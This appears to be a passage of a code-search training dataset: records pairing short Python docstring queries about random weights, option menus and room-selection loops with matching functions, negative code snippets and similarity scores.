"def _get_gaussian_random(self):\n u1 = generateRandom()\n u2 = generateRandom()\n if u1 < 1e-6:\n u1 = 1e-6\n return sqrt(-2 * log(u1)) * cos(2 * pi * u2)",
"def calc_error_dist(self):\n pass",
"def randerr(size=1,func='normal',**kwargs):\n kwargs.update(size=size)\n funclower = func.lower()\n if funclower in ['normal','gaussian','gauss']:\n rvs = stats.norm.rvs\n elif funclower in ['uniform']:\n rvs = stats.uniform(-1,2).rvs\n elif funclower in ['lorentzian','cauchy']:\n rvs = stats.cauchy.rvs\n elif funclower in ['delta']:\n rvs = stats.randint(1,2).rvs\n else:\n raise Exception('Unrecognized type: %s'%func)\n return rvs(**kwargs)",
"def get_sqrt_2():\n return 1.41421356",
"def random_normal():\n return inverse_normal_cdf(random.random())",
"def normal_probability(a):\n x = a * SQRTH\n z = np.abs(x)\n \n if z < SQRTH:\n y = 0.5 + 0.5 * error_function(x)\n else:\n y = 0.5 * error_function_complemented(z)\n if x > 0:\n y = 1.0 - y\n return y",
"def eff_random(eff_mean, tau_std):\n tau = (-1.0/np.log(eff_mean))/(2*np.pi)\n tau = np.random.normal(tau, tau_std)\n return np.exp(-1/(2*np.pi*tau))",
"def mag(self) -> float:\n return sqrt(self.sqr_mag())",
"def gmae(self) -> float:\n return _geometric_mean(np.abs(self._error()))",
"def mag(a):\n return sqrt(a[0]*a[0]+a[1]*a[1]+a[2]*a[2])",
"def standardError(self):\n return math.sqrt(self.standardError2())",
"def time_to_failure():\n return int(random.expovariate(BREAK_MEAN))\n #return MTBF",
"def rvs(self):\n return float(self.interp(random.rand()))",
"def random_vector_in_unit_ball():\n x = np.random.normal(loc=0.0, scale=1.0, size=(numSamples, self.dim))\n z = np.random.exponential(scale=1.0, size=(numSamples,))\n d = (np.sum(np.square(x), axis=1) + z) ** 0.5\n d = d[:, np.newaxis]\n return x / d",
"def rmse(actual, predicted):\n rms = (actual-predicted)**2\n\n # Returning the sqaure root of the root mean square\n return float(np.sqrt(rms.mean()))",
"def calculateErrorRate(numCorrect, numWrong):\n return np.round((numWrong)/(numCorrect+numWrong),3)",
"def std_err(p_hat, n):\n\n return np.sqrt((p_hat)*(1-p_hat)/n)",
"def rmspe(self) -> float:\n return float(np.sqrt(np.mean(np.square(((self.true - self.predicted) / self.true)), axis=0)))",
"def rand_uni_val() -> float:\n return random.uniform(0, 1)",
"def rsr(self) -> float:\n return float(self.rmse() / np.std(self.true))"
] |
[
"0.81952596",
"0.6543351",
"0.6431196",
"0.6320314",
"0.6304057",
"0.6242931",
"0.6069427",
"0.60419965",
"0.6036287",
"0.60287774",
"0.60102165",
"0.6001173",
"0.5979543",
"0.5971652",
"0.5969251",
"0.5958259",
"0.59394056",
"0.591453",
"0.5869372",
"0.5855773",
"0.58526",
"0.58367014",
"0.5824888",
"0.58241856",
"0.5816158",
"0.5785741",
"0.57799447",
"0.5774071",
"0.57546157",
"0.57535374"
] |
0.82927364
|
0
|
Return a random float in the range [MIN_WEIGHT, MAX_WEIGHT]
|
def _random_weight(self):
return random.uniform(MIN_WEIGHT, MAX_WEIGHT)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def random_weight():\n # We found that random.randrange(-1,2) to work well emperically \n # even though it produces randomly 3 integer values -1, 0, and 1.\n return random.randrange(-1, 2)\n\n # Uncomment the following if you want to try a uniform distribuiton \n # of random numbers compare and see what the difference is.\n # return random.uniform(-1, 1)",
"def random_float():\n return (random() - 0.5) * 2",
"def weighted_bright():\n return np.random.choice(\n [17, 18, 19, 20, 21] * 1 +\n [22, 23, 24, 25, 26] * 2 +\n [27, 28, 29, 30, 31] * 3\n )",
"def weighted_random_item(items, weight):\n if not items:\n return None\n\n weight_sum = sum(weight(item) for item in items)\n if weight_sum <= 0:\n return None\n\n choice = random.random() * weight_sum\n for item in items:\n choice -= weight(item)\n if choice < 0:\n return item, weight(item) / weight_sum\n return items[-1], -1 # floating-point rounding error",
"def float(self, max_=None):\n max_ = self.max_float if max_ is None else max_\n return max_ * (self.rng.random() - 0.5)",
"def sample_from(self, weights):\n total = sum(weights)\n rnd = total * random.random() # uniform between 0 and total\n for i, w in enumerate(weights):\n rnd -= w # return the smallest i such that\n if rnd <= 0:\n return i # weights[0] + ... + weights[i] >= rnd",
"def weightGenerate(self):\n\t\tfor i in range(0, self.numberOfInput):\n\t\t\tself.weight.append(random.random()-0.5)",
"def pick_weighted(weights, vals, eps=1.0e-4):\n\t\n\tweightSum = cumsum(weights)\n\tif weightSum[-1] == 0:\n\t\treturn random.choice(vals)\n\tif abs(weightSum[-1]-1.0) > eps:\n\t\traise RuntimeError(\"Weights don't sum to 1\")\n\tr = random.uniform(0.0,1.0)\n\tfor v,w in zip(vals, weightSum):\n\t\tif r > w:\n\t\t\tcontinue\n\t\treturn v\n\treturn vals[-1]",
"def _generate_weights(self):\n weights = [random.uniform(0, 1) for x in range(self.num_weights)]\n return self._normalize_weights(weights)",
"def random() -> float:\n ...",
"def weighted_choice(items: List[Tuple[str, float]]) -> str:\r\n total_weight = sum(item[1] for item in items)\r\n n = random.uniform(0, total_weight)\r\n for item, weight in items:\r\n if weight > n:\r\n return item\r\n n -= weight\r\n return item",
"def weighted_choice(items):\n weight_total = sum((item[1] for item in items))\n n = random.uniform(0, weight_total)\n for item, weight in items:\n if n < weight:\n return item\n n = n - weight\n return item",
"def _weighted_choice(self, lst):\n \n total_weight = reduce(lambda x,y:x+y, [tup[1] for tup in lst])\n n = random.uniform(0, total_weight)\n for item, weight in lst:\n if n < weight:\n break\n n = n - weight\n return item",
"def weighted_choice(items):\n weight_total = sum((item[1] for item in items))\n n = random.uniform(0, weight_total)\n for item, weight in items:\n if n < weight:\n return item\n n = n - weight\n return item",
"def weightedrandomchoice(items): # {{{2\n total = 0\n items.sort(reverse=True, key=lambda x:x[0])\n for item in items:\n total += item[0]\n threshold = random.uniform(0, 0.6) * total\n for item in items:\n threshold -= item[0]\n if threshold <= 0:\n return item[1]",
"def _rand_float(self, low, high):\n\n return self.np_random.uniform(low, high)",
"def random_weights(Graph,percision=3):\r\n percisionStr = \"{\"+\"0:.{}f\".format(percision)+\"}\"\r\n float(percisionStr.format(random.random()))\r\n Graph.es['weight'] = [float(percisionStr.format(random.random())) for i in range(Graph.ecount())] \r\n return Graph",
"def select(weights):\n r = random.random() * sum(weights)\n s = 0.0\n for k,w in enumerate(weights):\n s += w\n if r <= s:\n return k\n raise RuntimeError(\"select WTF from %s\" % weights)",
"def weightedChoice(weights, objects, apply_softmax=False, alpha=None):\n if apply_softmax: weights = softmax(weights)\n if alpha: weights = normalize([w**alpha for w in weights])\n cs = np.cumsum(weights) #An array of the weights, cumulatively summed.\n idx = sum(cs < np.random.rand()) #Find the index of the first weight over a random value.\n idx = min(idx, len(objects)-1)\n return objects[idx]",
"def randomize(self):\n self.weights = np.random.rand(*self.weights.shape) - 0.5",
"def test_node_weight_range_max(self):\n n = Node(inputs=3)\n for i in n.weights:\n self.assertLess(i, 0.1)",
"def weighted_choice(weights):\n totals = []\n running_total = 0\n\n for w in weights:\n running_total += w\n totals.append(running_total)\n\n rnd = random.random() * running_total\n for i, total in enumerate(totals):\n if rnd < total:\n return i",
"def WeightInitializer():\n return np.random.uniform(-1, 1)",
"def sample_float(self, start, end, step):\n self.minimum = start\n self.maximum = end\n return random.sample(list(np.arange(start, end, step)), k=self._sample_size)",
"def random_float(low: float, high: float):\n seed = time.time()\n random.seed(seed)\n return random.uniform(low, high)",
"def test_node_weight_range_min(self):\n n = Node(inputs=6)\n for i in n.weights:\n self.assertGreaterEqual(i, -0.1)",
"def random_temp():\n temp_min = 154\n temp_max = 500\n temp_interval = 1\n # `range`s are exclusive [min, max)\n return random.randrange(temp_min, temp_max + 1, temp_interval)",
"def mutate(weights,gen):\n mutated_weights = []\n for weight in weights:\n new_weight = np.random.normal(loc=weight, scale=0.5/(gen+1))\n if new_weight >= -1 and new_weight <= 1:\n mutated_weights.append(new_weight)\n elif new_weight < -1:\n mutated_weights.append(-1)\n else:\n mutated_weights.append(1)\n return np.array(mutated_weights)",
"def weighted_choice(weighted_items, num_items=1):\n total = 0\n cume_list = []\n\n for item, weight in weighted_items.items():\n total += weight\n cume_list.append([item, total])\n\n for pair in cume_list:\n pair[1] /= total\n\n items = []\n\n for _ in range(num_items):\n rand = random()\n\n for item, val in cume_list:\n if rand <= val:\n items.append(item)\n break\n\n assert num_items == len(items), (weighted_items, items)\n\n if num_items == 1:\n return items[0]\n\n return items",
"def he_uniform(weight_shape):\n if len(weight_shape) == 4:\n fW, fH, fC, _ = weight_shape\n return np.random.uniform(-np.sqrt(6 / (fW*fH*fC)), np.sqrt(6 / (fW*fH*fC)), weight_shape)\n num_input, _ = weight_shape\n return np.random.uniform(-np.sqrt(6 / num_input), np.sqrt(6 / num_input), weight_shape)"
] |
[
"0.7570449",
"0.70938075",
"0.7011047",
"0.6810181",
"0.6796796",
"0.6776659",
"0.67762464",
"0.6731501",
"0.67143947",
"0.66815233",
"0.664851",
"0.66397256",
"0.66202104",
"0.6619948",
"0.65967226",
"0.6577365",
"0.6533013",
"0.6486401",
"0.6468668",
"0.64540213",
"0.64516544",
"0.6439352",
"0.64017135",
"0.637879",
"0.63544",
"0.6324905",
"0.6317377",
"0.62981325",
"0.62717575",
"0.6269453"
] |
0.84455985
|
0
|
This is used to quickly jump to the Start Menu Loop from the Code Explorer
|
def STARTMENU_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def start(self):\n self.menu()",
"def goto_menu(self, *args):\n self.manager.current = 'Main Menu'\n self.reset()\n self.manager.reset()",
"def home(self):\n self.goto(0, 0)",
"def start(self):\n op = self.menu()\n self.opcoes(op)\n if op != \"q\" and op != \"w\":\n self.start()",
"def start(self) -> None:\n self.execute_startup_menu()\n self.execute_main_menu()",
"def start():\r\n window = loop_menuDolar()\r\n window.close()",
"def return_menu(self):\n while True:\n number = pyip.inputNum(\"0. Back to the main menu: \")\n if number == 0:\n # Clean up the console\n self.clear_console()\n # back to the main menu\n self.run()\n else:\n print('Press the number zero to go back')",
"def menu():\n menu = 'main'\n while 1:\n if menu == 'main':\n click.echo('Main menu:')\n click.echo(' d: debug menu')\n click.echo(' q: quit')\n char = click.getchar()\n if char == 'd':\n menu = 'debug'\n elif char == 'q':\n menu = 'quit'\n else:\n click.echo('Invalid input')\n elif menu == 'debug':\n click.echo('Debug menu')\n click.echo(' b: back')\n char = click.getchar()\n if char == 'b':\n menu = 'main'\n else:\n click.echo('Invalid input')\n elif menu == 'quit':\n return",
"def __continue(self, *args):\n return Menu.CONTINUE",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def menu(self):\n from mainmenu import Menu\n gm = Menu(self.screen)\n gm.run()",
"def start(self):\n print(\"*\"*20)\n print(\"*\" + \" \"*18 + \"*\")\n print(\"*\" + \" \"*4 + \"Connect 4X\" + \" \"*4 + \"*\")\n print(\"*\" + \" \" * 18 + \"*\")\n print(\"*\" * 20)\n print(\"\\nConsole Version 1.0.0\\n\")\n self.print_menu()\n self.get_input()",
"def main_menu_for_testing():\n print(PROMPT_TEXT)",
"def action_goto(self):\n dialog = GoToDialog(self)\n dialog.exec()\n\n # Re-focus the main window\n self.activateWindow()",
"def print_main_menu():\n print(\"\\nWelcome to the Zendesk Ticket Viewing System!\\nInstructions:\")\n print(\"~ Enter '1' to view all tickets\")\n print(\"~ Enter '2' to view a certain ticket\")\n print(\"~ Enter '3' to view these options again\")\n print(\"To exit the ticketing system enter 'quit'\")",
"def start_module():\n\n while True:\n handle_menu()\n try:\n if choose() == 0:\n break\n except KeyError as err:\n ui.print_error_message(str(err))",
"def start_module():\n\n while True:\n handle_menu()\n try:\n if choose() == 0:\n break\n except KeyError as err:\n ui.print_error_message(str(err))",
"def go_to_start(self):\n self.go_to(0)",
"def goto(self, item):\n command = 'goto ' + str(item)\n self.run_command(command)",
"def startapp(self, command):\n e = self.emu\n e.alt(\"F2\")\n e.shortwait()\n e.clickat(self.screen.center)\n e.shortwait()\n e.type(command + \"\\n\")\n e.longwait()",
"def main():\n st.sidebar.title(\"Menu\")\n selection = st.sidebar.radio(\"Go to\", list(PAGES.keys()))\n\n page = PAGES[selection]\n\n with st.spinner(f\"Loading {selection} ...\"):\n ast.shared.components.write_page(page)",
"def goToFirstFrame():\n nuke.frame(int(nuke.root()[\"first_frame\"].getValue()))",
"def onClick(self):\n self.app.setActiveMode(\"start\")",
"def main():\n run_it = tools.Control(prepare.ORIGINAL_CAPTION)\n state_dict = {\"SPLASH\" : splash.Splash(),\n \"MENU\" : menu.Menu(),\n \"DEMO\" : demo.Demo(),\n \"GAME\" : game.Game()}\n run_it.setup_states(state_dict, \"SPLASH\")\n run_it.main()",
"def restart_menu(self):\n self.__show_menu = True",
"def start_menu() -> None:\n option_list = (\"1\", \"new game\", \"2\", \"load game\", \"3\", \"help\", \"4\", *exit_list)\n print(MenuSprites.start_menu)\n\n while (selection := input(\">\").lower()) not in option_list:\n print(f\"Invalid selection: {selection}\")\n\n selection = selection.lower()\n\n if selection in [\"1\", \"new game\"]:\n inv.state.new_player()\n return main_menu()\n\n elif selection in [\"2\", \"load game\"]:\n inv.load()\n return main_menu()\n\n elif selection in [\"3\", \"help\"]:\n pass\n\n elif selection in [\"4\", *exit_list]:\n quit()",
"def frame(self):\n self.run_command('frame')",
"def help_menu():\n print('\\n##################################################')\n print('################ Help Menu ###############') \n print('##################################################')\n print(' Type move or examine for each turn') \n print(' If moving, type up, down, left, or right')\n print(' If examining, you may need to answer yes or no')\n print('##################################################\\n')\n title_screen_selections()",
"def point_of_interest():\n for fi in inspect.stack()[1:]:\n if fi.function == '_run':\n # go all the way up to server start func\n break\n\n file = Path(fi.filename)\n\n # print line num, index, func name & locals for each frame.\n log(f'[{fi.function}() @ {file.name} L{fi.lineno}:{fi.index}] {fi.frame.f_locals}', Ansi.LBLUE)\n\n msg = '\\n'.join((\n \"Hey! If you're seeing this, osu! just did something pretty strange,\",\n \"and the gulag devs have left a breakpoint here. We'd really appreciate \",\n \"if you could screenshot the data above, and send it to cmyui, either via \",\n \"Discord (cmyui#0425), or by email ([email protected]). Thanks! 😳😳😳\"\n ))\n\n printc(msg, Ansi.LRED)\n input('To close this menu & unfreeze, simply hit the enter key.')",
"def main():\n # Add your main code here\n display_menu()\n pass"
] |
[
"0.71798974",
"0.6878403",
"0.6776373",
"0.6688196",
"0.650974",
"0.64464825",
"0.64293313",
"0.64215064",
"0.63442796",
"0.63122696",
"0.62531924",
"0.62444067",
"0.6239972",
"0.62016857",
"0.6131184",
"0.6120715",
"0.6120715",
"0.6086501",
"0.60707784",
"0.60664964",
"0.6022832",
"0.6016421",
"0.60147756",
"0.5975118",
"0.5972612",
"0.5965154",
"0.5952914",
"0.5944758",
"0.59188116",
"0.59087193"
] |
0.7082131
|
1
|
This is used to quickly jump to the Options Loop from the Code Explorer
|
def OPTIONS_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def OnButtonOptionsHelpButton(self, event):\r\n\t\twebbrowser.open(consts.URL_HELP_OPTIONS)",
"def display_other_options():\n print(\"> - Next Song page.\")\n print(\"< - Previous song page.\")\n print(\"q - to quit\")",
"def help_opt(self):\n print(OPTIONS)",
"def help_select(self):\n print(SELECT)",
"def basic_menu(dict_of_options, back=False):\n choose = True\n dict_of_options = final_option(dict_of_options, back)\n list_of_options = list(dict_of_options.keys())\n\n while choose:\n print('The following options are available:\\n')\n for option in enumerate(list_of_options):\n print('\\t{} - {}'.format(option[0], option[1]))\n pick = input('\\nType the numeric code you wish to run\\n\\n')\n if pick in [str(i) for i in range((len(dict_of_options)))]:\n choose = dict_of_options[list_of_options[int(pick)]]()\n else:\n print('{} is not currently an option!\\n'.format(pick))",
"def quick_test():\n do_command('Help: Command=Help')\n do_command('Help: Command=\"GetInfo\"')\n #do_command('SetPreference: Name=GUI/Theme Value=classic Reload=1')",
"def switch_to_options_screen(self, player, option_index = 0):\n\t\tcontrols = SelectControls(player)\n\t\tcontrol_manager = ControlManager(controls)\n\t\toptions_screen = OptionsScreen(control_manager, player)\n\t\toptions_screen.option_index = option_index\n\t\tself.set_current_screen(options_screen)",
"def openOptions(self, e):\n\n\t\tself.unBind()\n\t\tself.menu_manager.runOptions()\n\t\tself.main_menu_window.root.destroy()",
"def show_menu():\r\n print(\"Write a number of the next options:\")\r\n for key, value in enumerate(options):\r\n print(\"{}. {}\".format(key, value))",
"def main(self, options):\n raise NotImplementedError",
"def help_option(args, run):\n pass",
"def otherOptionsFullScreen(self):\n\n # Set Storage List\n storageList = []\n # Create Intel explain menu\n menuDisplay = \"\"\"\n \\n\n [*] Information Verbose:\n Ontop of Asking for the Username and \n Password Should we Gather Even\n More Information about the User such as \n GEOIP / ISP / User Agent etc. etc. \n This Requires Curl to be installed or \n file_get_contents in PHP on selected Server \n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n # Set Verbose of Intel Gather\n self.results = input(\n \"\\nWould you like to Build a More In-depth Intel Report on Victim ( y Or n ): \")\n if self.results.lower()[0] == \"y\" or self.results.lower() == \"yes\":\n storageList.append(\"INTEL_VERBOSE_LOUD\")\n elif self.results.lower()[0] == \"n\" or self.results.lower() == \"no\":\n storageList.append(\"INTEL_VERBOSE_HUSH\")\n else:\n # Anything Else lets just Hush it then\n storageList.append(\"INTEL_VERBOSE_HUSH\")\n # Redirect Ask\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = Redirect URL Which is the Same \n = URL of the Full-Screen Attack \n = you picked. For Instance If \n = it was AOL Full-Screen Attack\n = the default URL redirect would \n = be https://my.screenname.aol.com\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"After the Victim Inputs Info Where Should the Script Redirect?: \")\n # Check if nothing was entered\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"REDIRECT_DEFAULT\")\n else:\n # No Checking on URL Let Them Use Whatever lol there bad i guess\n # Append Default Redirect Naaaow\n storageList.append(self.results)\n\n # Spoof link\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = What do you want the URL Link to be spoofed\n = to? This will be displayed when the user\n = rolls over the link. Basically tricking\n = them making them think they are going\n = to that URL..\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"What should the URL be spoofed to? (ex: https://my.screenname.aol.com): \")\n # Check if nothing was entered\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"DEFAULT_SPOOF\")\n else:\n # Append specified spoof url now\n storageList.append(self.results)\n\n # link name\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = What do you want the Actual URL name\n = to be?\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"What should the URL name be? (ex: Aol Login): \")\n # Check if nothing was entered\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"DEFAULT_URL_NAME\")\n else:\n # Append url name\n storageList.append(self.results)\n\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = name of Index.php If you feel \n = the need to change the name please \n = do not add the actual extension .php \n = along with it only add whatever crazy \n = name you come up with\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"What Should the Main Index PHP File Be Called? 
( ex: login ) : \")\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"INDEX_DEFAULT\")\n else:\n check = self.results.find(\".\")\n # if it doesn't return a -1 it found a decimal\n if check != -1:\n # Throw Error we found a dot\n self.errorOutput(\n \"[*] Error - Didn't We Say Not to Add an Extension, WOW...\", \"yellow\")\n else:\n # Append name of the File\n storageList.append(self.results)\n\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = Title of the Webpage.\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"blue\")\n self.results = input(\n \"What Should the Title of the Page be? (ex: AOL Login ) : \")\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"TITLE_DEFAULT\")\n else:\n # Append name of the File\n storageList.append(self.results)\n\n # Return Storage List for Processing\n return storageList",
"def menu():\n menu_options = [enter_long_run_data, enter_data_for_pace_calc, enter_data_for_time_calc,\n enter_into_running_index_mode, close_program]\n while True:\n cls()\n print(MENU_TEXT)\n choose = int(input(\"What do you want to calculate?\\n>> \"))\n cls()\n\n if 1 <= choose <= 5:\n menu_options[choose-1]()\n else:\n print(\"That option doesnt exist. Try again.\")\n pause_end()",
"def main():\n is_program_working = True\n while is_program_working:\n display.print_program_menu(MAIN_MENU)\n try:\n choose_option()\n except ValueError as err:\n display.print_command_result(str(err))",
"def __continue(self, *args):\n return Menu.CONTINUE",
"def _present_user_calculator_options_interface(self):\n print(\"\\nwelcome to the calculator\")\n print(\"What would you like to do\")\n print(\"Choose a number:\")\n print(\"1)Solve an equation\")\n print(\"2)Exit\")",
"def settings( self, selection ):\r\n if( self.__optionsDatabase.showOptionsDatabase() ):\r\n self.main( selection )",
"def help_menu():\n print('\\n##################################################')\n print('################ Help Menu ###############') \n print('##################################################')\n print(' Type move or examine for each turn') \n print(' If moving, type up, down, left, or right')\n print(' If examining, you may need to answer yes or no')\n print('##################################################\\n')\n title_screen_selections()",
"def run(self):\n try:\n while True:\n utils.clear_screen()\n utils.write('Which of the following actions would you like to take?\\n')\n for opt in self._options.values():\n utils.write('Action: {!r}\\nDescription: {}\\n'.format(\n opt.name, opt.description))\n action = utils.prompt_enum(\n '', accepted_values=list(self._options.keys()),\n case_sensitive=False).strip().lower()\n callback = self._options[action].callback\n if callback is None:\n break\n self = callback()\n finally:\n utils.write(\n 'Done managing Grab n Go for Cloud Project {!r}.'.format(\n self._config.project))",
"def show_main_screen():\n option = algo_selection(algos)\n if option == 1:\n print_factorial()\n show_main_screen()\n if option == 2:\n print_gcd()\n show_main_screen()\n if option == 3:\n print_pow()\n show_main_screen()\n if option == 4:\n print_towers()\n show_main_screen()\n if option == 5:\n print_permutations()\n show_main_screen()\n if option == 6:\n raise SystemExit(0)",
"def menuItem(*args):\n\toptionsWindow()",
"def print_menu_Tasks():\r\n print(\"\"\"\r\n Menu of Options\r\n 1) Add a new keyboard\r\n 2) Save Keyboards to File\r\n 3) Show current keyboard list\r\n 4) Exit Program\r\n \"\"\")",
"def getopt():\n raise NotImplementedError()",
"def _interact_with_user(code: str, increase: bool):\n pass",
"def main(debug):\n click.echo('Debug mode is {{}}'.format(debug))",
"def help_me():\n print(\"i'm trapped\")",
"def main_menu():\n print('\\n', '='*50, sep='')\n print(\"Choose an option by number: \")\n print(\"\\t 1 = Create or Connect to a new file database\")\n print(\"\\t 2 = Create a new memory database\")\n print('Type exit to quit program!')\n print('='*50, '\\n', sep='')",
"def options():\r\n pygame.display.flip()\r\n\r\n click = False\r\n waiting = True\r\n while waiting:\r\n # sets the game_over background\r\n const.WINDOW.blit(const.OPTIONS_SCREEN, (0, 0))\r\n\r\n # get the mouse cursor position\r\n x, y = pygame.mouse.get_pos()\r\n\r\n # creates the buttons\r\n back_button = pygame.Rect(242, 892, 325, 54) # back to main menu\r\n\r\n # if click on play button, then starts the game\r\n if back_button.collidepoint((x, y)):\r\n if click:\r\n return # problem: it doesn't restart the game\r\n\r\n # draws the buttons\r\n pygame.draw.rect(const.WINDOW, const.DARK_GREY, back_button, 1)\r\n\r\n click = False\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n click = True\r\n\r\n pygame.display.update()\r\n const.CLOCK.tick(30)",
"def menu_select_option(self, app: object) -> None:\n while True:\n self.back = False\n print(\"-\" * 50)\n for key, element in self.cmd_select_option.items():\n print(f\"{key} : {element}\")\n entry = input(\n \"\\nEntrer un chiffre pour sélectionner l'option correspondante : \"\n )\n if entry == \"1\":\n self.menu_categories(app)\n elif entry == \"2\":\n save = app.view_save()\n print(\"-\" * 50 + \"\\nSubstitut(s) enregistré(s) :\\n\")\n for prod, sub in save.items():\n print(f\"Produit {prod} substitué par {sub} \")\n elif entry == \"0\":\n break\n else:\n print(\"\\nCommande incorrecte\")",
"def debug_option(args, run):\n run.debug = True"
] |
[
"0.6238629",
"0.6180159",
"0.61225075",
"0.59989923",
"0.59854394",
"0.5905911",
"0.5844399",
"0.58427507",
"0.5764392",
"0.57433075",
"0.57324344",
"0.57227015",
"0.56916445",
"0.56883585",
"0.56763846",
"0.56689197",
"0.5665599",
"0.5660199",
"0.56284314",
"0.5613474",
"0.56056595",
"0.5601698",
"0.55957484",
"0.55734026",
"0.5572607",
"0.5569655",
"0.5569603",
"0.55328023",
"0.5532603",
"0.5527121"
] |
0.6788612
|
0
|
This is used to quickly jump to the Room Selection Loop from the Code Explorer
|
def ROOMSELECTION_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def PLAYERSELECTION_LOOP():\n pass",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def choose_room():\n while True:\n print_rooms()\n print(\"Type 'back' to go to main menu.\")\n print(\"Which room would you like to explore?\")\n room_choice = player_choice(\"\")\n if room_choice == 'back':\n break\n elif room_choice in rooms:\n # print(f\"You are at {room_choice}.\")\n if room_choice == 'back':\n break\n elif room_choice == \"lilian's room\":\n rm = Rooms(room_choice)\n rm.unlock()\n sk = SilverKey('silver key')\n sk.use()\n elif room_choice == \"dining room\":\n dr = DineRoom(room_choice)\n dr.nothing()\n elif room_choice == \"lilian's office\":\n rm = Rooms(room_choice)\n rm.unlock()\n gk = GoldenKey('golden key')\n gk.use()\n elif room_choice == \"kitchen\":\n rm = Rooms(room_choice)\n rm.room_wall()\n kn = Kitchen(room_choice)\n kn.choose_wall()\n elif room_choice == \"outside\":\n rm = Rooms(room_choice)\n rm.unlock()\n bk = BronzeKey('bronze key')\n bk.use()\n elif room_choice == \"jay's room\":\n rm = Rooms(room_choice)\n rm.room_wall()\n jr = JayRoom(room_choice)\n jr.choose_wall()\n elif room_choice == \"megan's room\":\n rm = Rooms(room_choice)\n rm.room_wall()\n mg = MegRoom(room_choice)\n mg.choose_wall()\n elif room_choice == \"abriella's room\":\n ab = AbRooom(room_choice)\n ab.nothing()\n else:\n print(f\"{room_choice.title()} is not one of the choices.\")",
"def go_to_selected_match(self):\n match = self.mapper.get(self.launcher_curr_pos)\n if match and self.view_buffer:\n self.misc.go_to_win(self.misc.bufwinnr(self.curr_buf.number))\n vim.command('silent! b {0}'.format(self.view_buffer))\n vim.current.window.cursor = (match[0], match[1] - 1)\n vim.command(\"normal! zz\")\n return True",
"def home(self):\n self.goto(0, 0)",
"def goto(self, item):\n command = 'goto ' + str(item)\n self.run_command(command)",
"def target_nearest_enemy():\n keyboard.send('ctrl+tab')",
"def main():\n player = Player(LivingRoom())\n escaping = True\n\n print('Alright kid, it\\'s you and me on a grand adventure. We\\'re '\n 'currently in the {}, and I can see {} possible exits. You can '\n 'search the room or try exploring, if you like.'\n .format(player.location.name, player.location.exits))\n\n while escaping:\n # need to replace hard list with extract from player.actions\n action = input('\\nWhat now?\\n\\n1. Search\\t2. Grab\\t3. Gurgle\\n>')\n\n if action in player.actions.keys():\n player.actions[action]()",
"def enter_loop(self):\n if (self.tape.current_cell()==0):\n # Jump past the end.\n self.instruction_pointer = (self.jump_map[self.instruction_pointer])\n else:\n pass",
"def __goto(self):\n from QScintilla.GotoDialog import GotoDialog\n \n aw = self.activeWindow()\n lines = aw.lines()\n curLine = aw.getCursorPosition()[0] + 1\n dlg = GotoDialog(lines, curLine, self.ui, None, True)\n if dlg.exec_() == QDialog.Accepted:\n aw.gotoLine(dlg.getLinenumber(), expand=True)",
"def play(self):\n print(f\"Welcome, to the Adventure games.\\n\"\n \"May the randomly generated numbers be ever in your favour.\\n\"\n f\"\\n{adventure.current_room.description}\")\n\n # Prompt the user for commands until they've won the game.\n while not self.won():\n # This method for FORCED only works on Small and Tiny,\n # it works until the end of CrowtherRooms, when FORCED is not the\n # only possible direction for a room. I am working on fixing this,\n # and I think I'm very close, but I won't be able to fix it in time.\n # I can send that version it by e-mail though, if you want!\n\n # For now, this handles the FORCED movements\n if len(adventure.current_room.connection) == 1:\n adventure.move(\"FORCED\")\n if adventure.current_room.id in self.idlist:\n print(adventure.current_room.name)\n else:\n print(adventure.current_room.description)\n if len(adventure.current_room.inventory.itemlist) > 0:\n for item in adventure.current_room.inventory.itemlist:\n print(f\"{item.name}: {item.description}\")\n\n # Get a new direction from the user\n command = input(\"> \")\n command = command.upper()\n movements = [\n \"NORTH\", \"SOUTH\", \"EAST\", \"WEST\", \"UP\", \"DOWN\",\n \"OUT\", \"IN\", \"XYZZY\", \"WAVE\", \"WATER\", \"JUMP\"]\n abbreviations = {\n \"Q\": \"QUIT\", \"L\": \"LOOK\", \"I\": \"INVENTORY\", \"N\": \"NORTH\",\n \"S\": \"SOUTH\", \"E\": \"EAST\", \"W\": \"WEST\", \"U\": \"UP\", \"D\": \"DOWN\"}\n if command in abbreviations and len(command) == 1:\n command = abbreviations[command]\n\n # Check if the command is a valid movement\n if command in movements and self.current_room.isvalid(command):\n\n # Print appropriate room name/description after moving\n self.idlist.append(adventure.current_room.id)\n 